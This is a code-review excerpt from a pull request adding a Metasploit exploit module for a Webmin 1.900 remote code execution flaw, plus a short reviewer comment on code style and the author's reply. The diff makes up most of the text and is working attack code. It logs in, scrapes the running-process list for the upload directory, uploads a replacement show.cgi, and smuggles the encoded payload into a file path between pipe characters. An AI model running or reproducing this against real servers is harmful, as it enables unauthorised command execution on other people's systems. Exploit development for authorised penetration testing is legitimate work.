modules/exploits/unix/webapp/webmin_1900_rce.rb

```diff
@@ -0,0 +1,296 @@
+        'method' => 'POST',
+        'uri' => "/session_login.cgi",
+        'cookie' => "testing=1",
+        'data' => data
+      }, 25
+    )
+
+    if res && res.code == 302 && res.get_cookies =~ /sid/
+      session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] || ''
+      if session && !session.empty?
+        print_good "Login successfully"
+      else
+        print_error "Authentication failed"
+        return
+      end
+    else
+      print_error "Authentication failed"
+      return
+    end
+
+    ##
+    # Directory and SSL verification for referer
+    ##
+    ps = datastore['SSL'].to_s
+    guess_dir = datastore['GUESSUPLOAD'].to_s
+    if ps == "true"
+      ssl = "https://"
+    else
+      ssl = "http://"
+    end
+
+    print_status("Target URL => #{ssl}#{peer}")
+
+    res1 = send_request_raw(
+      'method' => "POST",
+      'uri' => "/proc/index_tree.cgi?",
+      'headers' =>
+        {
+          'Referer' => "#{ssl}#{peer}/sysinfo.cgi?xnavigation=1"
+        },
+      'cookie' => "redirect=1; testing=1; sid=#{session}"
+    )
+
+    if res1 && res1.code == 200 && res1.body =~ /Running Processes/
+      print_status "Searching for directory to upload..."
+      stpdir =
+        res1
+        .body.scan(/perl.+miniserv.pl/)
+        .map { |s| s.split("perl ").last }
+        .map { |d| d.split("miniserv").first }
+        .map { |d| d.split("miniserv").first }
+      if !stpdir[0].nil?
+        dir = stpdir[0] + "file"
+        print_good("Directory to upload => #{dir}")
+      elsif guess_dir == "true" && stpdir[0].nil?
+        array = ["/usr/share/webmin/file"]
+        array.each do |i|
+          print_good("Attempting: " + i)
+          upload_attempt(ssl, peer, session, i)
+        end
+      else
+        print_error("Running processed check failed, not guessing uploads. Quitting.")
+        return
+      end
+    else
+      print_error "No access to processes or no upload directory found."
+      return
+    end
+
+    ##
+    # Loading phase of the vulnerable file
+    # Command execution and shell retrieval
+    ##
+    print_status("Attempting to execute the payload...")
+    command = payload.encoded
+    res = send_request_cgi(
+      {
+        'uri'     => "/file/show.cgi/bin/#{rand_text_alphanumeric(rand(0..9))}|#{command}|",
+        'cookie'  => "sid=#{session}"
+      }, 25
+    )
+
+    if res && res.code == 200 && res.message =~ /Document follows/
+      print_good "Payload executed successfully"
+    else
+      print_error "Error executing the payload"
+      return
+    end
+  end
+
+  def upload_attempt(ssl, peer, session, dir)
+    boundary = Rex::Text.rand_text_alphanumeric(29)
+
+    data2 = "-----------------------------#{boundary}\r\n"
+    data2 << "Content-Disposition: form-data; name=\"upload0\"; filename=\"show.cgi\"\r\n"
+    data2 << "Content-Type: application/octet-stream\r\n\r\n"
+    data2 << "#!/usr/local/bin/perl\n# show.cgi\n# Output some file for the browser\n\n"
```

Comment:
See sinner's comment about using the Mime lib.

If a raw HTTP request is required, please use a [Heredoc](https://www.rubyguides.com/2018/11/ruby-heredoc/). This code is unreadable and hard to maintain.

Reply:
Ok - I will update to the correct format shortly.